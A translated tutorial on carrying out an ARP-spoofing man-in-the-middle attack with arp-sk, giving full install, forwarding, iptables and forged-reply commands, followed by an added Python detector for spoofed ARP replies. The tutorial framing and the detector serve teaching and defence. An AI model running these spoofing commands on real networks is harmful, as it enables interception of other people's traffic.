Practice using arp-spoofing

    In this article I will show how to use the arp-sk utility in GNU/Linux to carry out a man-in-the-middle attack on the arp protocol.

    Why such an attack is needed:
    There are many articles on the hub about, for example, cracking Wi-Fi. But what do you do after the key is cracked? Here is one of the options.

    Bit of theory


    The arp protocol is needed for transmission in an Ethernet environment, because frames are delivered by mac address. Read more about mac addresses on Wikipedia:
    en.wikipedia.org/wiki/MAC-%D0%B0%D0%B4%D1%80%D0%B5%D1%81
    For a message to be transferred from one network device to another, in particular from Victim to Router, the computer needs to map the IP address to a mac address. Let's look at this process with the tcpdump utility:
    # tcpdump -i eth1 -vvv
    21:11:14.076068 ARP, Ethernet (len 6), IPv4 (len 4), Request who-has 192.168.4.1 tell 192.168.4.17, length 28
    21:11:14.077852 ARP, Ethernet (len 6), IPv4 (len 4), Reply 192.168.4.1 is-at 00:50:ba:46:5d:92 (oui Unknown), length 46


    The first packet: the computer sends a broadcast message to find out which mac address belongs to the IP address 192.168.4.1 and asks that the answer be sent to 192.168.4.17. It is not visible here, but when sending this request the computer 192.168.4.17 uses its own mac address as the source and the broadcast mac address (FF:FF:FF:FF:FF:FF) as the destination. Having received this packet, a network device compares the ip address with its own and, if they match, sends the next packet.
    The second packet: the device with the address 192.168.4.1 replies from its own mac address to the mac address given in the request, saying that the address 192.168.4.1 is at 00:50:ba:46:5d:92.

    Because the arp request is sent to the broadcast address, it can be received by anyone in the same broadcast segment as the source. This gives one attack option: constantly announce your own mac address. Then, when the victim computer sends an arp request for the router, it immediately receives a reply from the attacker, and its traffic is sent to the attacker.

    Our task: to obtain the Victim computer's traffic on the Attacker computer.
    For this we will use a gratuitous (unsolicited) arp reply. The arp protocol allows a device to send an arp request or reply even when no other device asked for it; this is useful, for example, when the router's mac address has changed. If the computer accepts gratuitous arp, it will overwrite the legitimate address with the attacker's address.

    Conducting an attack


    Installing the necessary software

    Arp-sk:
    # wget sid.rstack.org/arp-sk/files/arp-sk-0.0.16.tgz
    # tar xvzf arp-sk-0.0.16.tgz
    # cd arp-sk-0.0.16/
    # ./configure
    # make

    If the package compiles successfully, install it:
    # make install

    The options for running the command can be listed with the following key:
    # arp-sk --help

    Usage: arp-sk
    -r --reply отправлять ARP ответ

    -d --dst получатель в link layer ()
    -s --src источник в link layer ()

    -D --arp-dst получатель в ARP сообщении ([hostname|hostip][:MAC])
    -S --arp-src источник в ARP сообщении ([hostname|hostip][:MAC])

    -i --interface указать интерфейс (eth0)


    Address spoofing

    We must send the router and the victim computer arp messages saying that the other device's mac address is ours.
    Before that, we configure the Attacker computer to forward traffic. First, enable forwarding in the kernel:
    # echo 1 > /proc/sys/net/ipv4/ip_forward

    Now allow forwarded traffic through the packet filter. I use iptables, so I add accept rules to the FORWARD chain. Since I am attacking in a test network, I can add the following rules:
    # iptables -I FORWARD 1 -s 192.168.4.17 -j ACCEPT
    # iptables -I FORWARD 2 -d 192.168.4.17 -j ACCEPT

    These two rules allow the attacking computer to forward traffic to and from the address 192.168.4.17. Attention! These rules are potentially dangerous, especially if you have several network interfaces; in that case I recommend more precise rules.

    Let's look at the addresses. Our address:
    # ifconfig eth1 | grep HW
    eth1 Link encap:Ethernet HWaddr 00:13:CE:5C:11:34

    Addresses of the other devices:
    # arp -an
    ? (192.168.4.1) at 00:50:ba:46:5d:92 [ether] on eth1
    ? (192.168.4.17) at 00:1c:bf:41:53:4b [ether] on eth1

    Let's look at the routing table of the Victim computer:
    [image: Victim routing table]

    Now we send the following arp packets to the devices, substituting our own mac address for the other device's. The first, on behalf of 192.168.4.17, says that its mac address is now 00:13:CE:5C:11:34 and is sent to 192.168.4.1 (00:50:ba:46:5d:92); the second, on behalf of 192.168.4.1, says that its mac address is now 00:13:CE:5C:11:34 and is sent to 192.168.4.17 (00:1c:bf:41:53:4b):
    # arp-sk -i eth1 -r -s 00:13:CE:5C:11:34 -S 192.168.4.17 -d 00:50:ba:46:5d:92 -D 192.168.4.1
    # arp-sk -i eth1 -r -s 00:13:CE:5C:11:34 -S 192.168.4.1 -d 00:1c:bf:41:53:4b -D 192.168.4.17

    We get the following output (this is the output of the second command):
    + Initialization of the packet structure
    + Running mode "reply"
    + Ifname: eth1
    + Source MAC: 00:13:ce:5c:11:34
    + Source ARP MAC: 00:13:ce:5c:11:34
    + Source ARP IP : 192.168.4.1
    + Target MAC: 00:1c:bf:41:53:4b
    + Target ARP MAC: 00:1c:bf:41:53:4b
    + Target ARP IP : 192.168.4.17

    --- Start classical sending ---
    TS: 21:30:44.338540
    To: 00:1c:bf:41:53:4b From: 00:13:ce:5c:11:34 0x0806
    ARP For 192.168.4.17 (00:1c:bf:41:53:4b):
    192.168.4.1 is at 00:13:ce:5c:11:34

    Now let's look at the Victim's arp table:
    [image: Victim arp table after the attack]

    That is actually all. Now you can run your favorite sniffer and collect the packets you need, for example a ping to Yandex:
    [image: sniffer capture of the ping to Yandex]

    Addition: if a firewall is installed on the computer, it may display a message about spoofing.

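    The firewall message mentioned above comes from exactly the check a network monitor can do on the tcpdump output shown in the theory section. The following is an added example (not part of the original article or of arp-sk): it parses tcpdump's "who-has" / "is-at" lines and raises an alert when an ARP reply arrives that nobody requested, or when an IP address suddenly maps to a different mac than the one previously learned. The third sample line is constructed to show what the second arp-sk packet above would look like in the same capture.

```python
import re
from dataclasses import dataclass, field

# Parses the "tcpdump -vvv" ARP lines shown on the page (who-has / is-at).
REQ_RE = re.compile(r"Request who-has (\S+) tell (\S+)")
REP_RE = re.compile(r"Reply (\S+) is-at ([0-9A-Fa-f:]{17})")

@dataclass
class ArpMonitor:
    table: dict = field(default_factory=dict)   # ip -> mac learned so far
    pending: set = field(default_factory=set)   # ips with an outstanding who-has
    alerts: list = field(default_factory=list)

    def feed(self, line):
        # Consume one tcpdump line; return an alert string or None.
        m = REQ_RE.search(line)
        if m:
            self.pending.add(m.group(1))
            return None
        m = REP_RE.search(line)
        if not m:
            return None                          # not an ARP line we parse
        ip, mac = m.group(1), m.group(2).lower()
        reasons = []
        # A reply nobody asked for is what the arp-sk -r packets above look like.
        if ip not in self.pending:
            reasons.append("unsolicited reply")
        self.pending.discard(ip)
        # The strong signal: the IP was already bound to a different mac.
        old = self.table.get(ip)
        if old is not None and old != mac:
            reasons.append(f"mapping changed {old} -> {mac}")
        self.table[ip] = mac
        if not reasons:
            return None
        self.alerts.append(f"{ip} is-at {mac}: " + "; ".join(reasons))
        return self.alerts[-1]

def scan(text):
    # Run the monitor over a whole capture; return the alerts raised.
    mon = ArpMonitor()
    for line in text.splitlines():
        mon.feed(line)
    return mon.alerts

# Constructed sample: the two real lines from the page's capture, then what the
# spoofed reply to the victim would look like in the same capture.
SAMPLE = """\
21:11:14.076068 ARP, Ethernet (len 6), IPv4 (len 4), Request who-has 192.168.4.1 tell 192.168.4.17, length 28
21:11:14.077852 ARP, Ethernet (len 6), IPv4 (len 4), Reply 192.168.4.1 is-at 00:50:ba:46:5d:92 (oui Unknown), length 46
21:30:44.338540 ARP, Ethernet (len 6), IPv4 (len 4), Reply 192.168.4.1 is-at 00:13:ce:5c:11:34 (oui Unknown), length 46
"""
```

    Legitimate gratuitous ARP (a router failover, a host that just booted) also trips the "unsolicited reply" check, so the mapping change is the signal to act on; in production, seed the table with the known router and gateway macs instead of learning them from the first reply.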
    This information is for reference only. The author reminds you of Article 272 of the Criminal Code of the Russian Federation “Unlawful access to computer information”
